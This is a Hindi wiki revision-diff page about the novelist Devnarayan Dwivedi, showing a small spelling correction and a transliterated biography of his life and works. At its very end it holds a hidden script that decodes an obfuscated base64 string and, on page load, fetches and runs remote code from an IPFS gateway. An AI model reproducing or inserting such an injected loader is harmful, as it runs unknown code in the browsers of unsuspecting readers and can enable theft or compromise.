Difference between revisions of "देवनारायण द्विवेदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 3: Line 3:
 
*[[उत्तर प्रदेश]] में मिर्जापुर के भैंसा नामक गाँव में सन 1886 को देवनारायण द्विवेदी का जन्म हुआ था।
 
*[[उत्तर प्रदेश]] में मिर्जापुर के भैंसा नामक गाँव में सन 1886 को देवनारायण द्विवेदी का जन्म हुआ था।
 
*देवनारायण द्विवेदी की पुस्तक 'कर्त्तव्याघात' की [[1926]] में [[कहानी]] सम्राट [[प्रेमचन्द]] ने छः पृष्ठ की समीक्षा लिखी थी। इस समय प्रेमचंद जी ने कहा था कि- "[[हिन्दी]] में इतना अच्छा [[उपन्यास]] हमारी नज़रों से अब तक गुजरा नहीं था।"
 
*देवनारायण द्विवेदी की पुस्तक 'कर्त्तव्याघात' की [[1926]] में [[कहानी]] सम्राट [[प्रेमचन्द]] ने छः पृष्ठ की समीक्षा लिखी थी। इस समय प्रेमचंद जी ने कहा था कि- "[[हिन्दी]] में इतना अच्छा [[उपन्यास]] हमारी नज़रों से अब तक गुजरा नहीं था।"
*'[[गीतांजली]]' का अनुवाद भी देवनारायण जी ने किया था।
+
*'[[गीतांजलि]]' का अनुवाद भी देवनारायण जी ने किया था।
 
*इनके द्वारा लिखी गई पुस्तक 'देश की बात' सन [[1923]] में जब्त कर ली गई थी।
 
*इनके द्वारा लिखी गई पुस्तक 'देश की बात' सन [[1923]] में जब्त कर ली गई थी।
 
*देवनारायण द्विवेदी जी ने 'काशी समाचार' नामक एक राष्ट्रीय पत्र भी निकाला।
 
*देवनारायण द्विवेदी जी ने 'काशी समाचार' नामक एक राष्ट्रीय पत्र भी निकाला।

Revision as of 13:35, 2 June 2015

devanarayan dvivedi (janm- 1886, mirjapur, uttar pradesh; mrityu- 28 navambar, 1989) hindi ke pramukh upanyasakaroan mean se the. inhoanne 'kashi samachar' namak ek rashtriy patr bhi nikala tha.[1]

  • uttar pradesh mean mirjapur ke bhaiansa namak gaanv mean san 1886 ko devanarayan dvivedi ka janm hua tha.
  • devanarayan dvivedi ki pustak 'karttavyaghat' ki 1926 mean kahani samrat premachand ne chhah prishth ki samiksha likhi thi. is samay premachand ji ne kaha tha ki- "hindi mean itana achchha upanyas hamari nazaroan se ab tak gujara nahian tha."
  • 'gitaanjali' ka anuvad bhi devanarayan ji ne kiya tha.
  • inake dvara likhi gee pustak 'desh ki bat' san 1923 mean jabt kar li gee thi.
  • devanarayan dvivedi ji ne 'kashi samachar' namak ek rashtriy patr bhi nikala.
  • 28 navambar, 1989 ko devanarayan dvivedi ka dehavasan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. kashi ke sahityakar (hindi). . abhigaman tithi: 11 janavari, 2014.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>